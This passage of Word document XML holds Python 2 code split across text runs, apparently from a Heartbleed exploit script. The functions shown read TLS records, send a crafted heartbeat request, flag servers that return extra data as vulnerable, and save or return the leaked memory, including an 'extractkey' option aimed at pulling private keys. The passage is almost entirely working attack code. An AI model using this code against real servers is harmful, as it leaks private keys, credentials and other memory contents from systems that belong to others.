        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pdat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="564C90EB" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="52607956" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">        else:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A1BBCA5" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="7520EF10" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pdat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> += ''.join((c if ((32 &lt;= </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ord</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(c) &lt;= 126) or (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ord</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(c) == 10) or (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ord</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">(c) == 13)) else '.' )for c in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>lin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B8032F3" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="502F4AC0" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">    if </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>opts.hexdump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4153839D" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="3BECEC09" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">    return </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hexd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0B27F27C" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="168E3107" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">    else:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67FB92F0" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="3940E046" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pdat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>re.sub</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">(r'([.]{50,})', '', </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pdat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08E8A42A" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="5FEEA4B7" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">        if </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>opts.asciioutfile</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6131E8EE" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="52C1D43E" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>asciifileOUT.write</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pdat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70F829EF" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="7B6DA6BD" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">        return </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pdat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="38A296AC" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="507B219F" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="1EC5A223" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="1EE9D63C" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">def </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>rcv_tls_record</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(s):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BCC7425" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="3D9079B2" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">    print 'Analyze the result....'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A997BBA" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="1D2C7526" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">    try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D96FFD5" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="34E15DBB" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tls_header</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>s.recv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(5)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44D5901F" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="5006D026" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">        if not </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tls_header</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="306C284F" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="405324C2" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">            print 'Unexpected EOF (header)' </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50B5F9F2" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="7042A016" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">            return </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>None,None,None</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="470470C4" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="1066E3F3" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>typ,ver,length</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>struct.unpack</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>('&gt;BHH',</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tls_header</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5643A576" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="7C2F84F1" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">        message = ''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="460C1307" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="5842C896" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">        while </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>len</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(message) != length:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1516028E" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="086CAFD2" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">            message += </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>s.recv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(length-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>len</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(message))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CA1C189" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="748A9216" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">        if not message:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="031356B9" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="17F2AD15" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">            print 'Unexpected EOF (message)'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53E6C91C" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="57BE16C7" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">            return </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>None,None,None</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="327CC7CE" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="7809F8CF" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">        if </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>opts.verbose</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="319B0846" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="23992EA3" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">        print 'Received message: type = {}, version = {}, length = {}'.format(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>typ,hex</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ver</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>),length,)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="469EE873" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="59485752" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">        return </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>typ,ver,message</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="474AD2EF" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="1C8AF51E" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">    except Exception as e:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19EA2EA8" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="480CA3B2" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">        print "\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nError</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Receiving Record! " + str(e)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27F0B424" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="583B7FB3" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">        return </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>None,None,None</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7D9EDFD3" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="52FD8DC6" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="6434C2F6" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="572855FF" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">def </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hit_hb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">(s, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>targ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>firstrun</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, supported):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4177F06D" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="314F68CE" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>s.send</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(hex2bin(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>build_heartbeat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(supported)))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E746D31" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="638DE024" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">    while True:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54DCC222" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="34107243" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>typ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ver</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, pay = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>rcv_tls_record</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75FC3AFF" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="68702D7D" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">        if </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>typ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> is None:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="328E0122" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="0CCE3E56" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">            print 'No heartbeat response received, server likely not vulnerable'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F3A1992" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="52F3D5F2" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">            return ''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F6391EF" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="59E262AD" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="5CF07391" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="0F8E7106" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">        if </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>typ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> == 24:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6692A382" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="22979223" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">            if </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>opts.verbose</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BCE0F60" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="1B30945E" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">                print 'Received heartbeat response...'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31B8A05C" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="12ECA478" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">            if </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>len</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(pay) &gt; 0x29:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B6E482B" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="70D3526A" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">                if </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>firstrun</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>opts.verbose</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="760DA092" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="03D5E8D2" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">                    print '\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nWARNING</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">: ' + </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>targ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> + ':' + str(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>opts.port</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>) + ' returned more data than it should - server is vulnerable!'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4051636E" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="0D605412" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">                if </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>opts.rawoutfile</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4385F99A" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="05C5523B" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">                    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>rawfileOUT.write</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(pay)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DF04745" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="05EB17DC" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">                if </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>opts.extractkey</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26FEF4B7" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="1DFEE740" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">                </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>return pay</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56FA42C3" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="59E01BBD" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">                else:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="059506E4" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="41361B84" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">                return </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hexdump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(pay)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53CA63C1" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
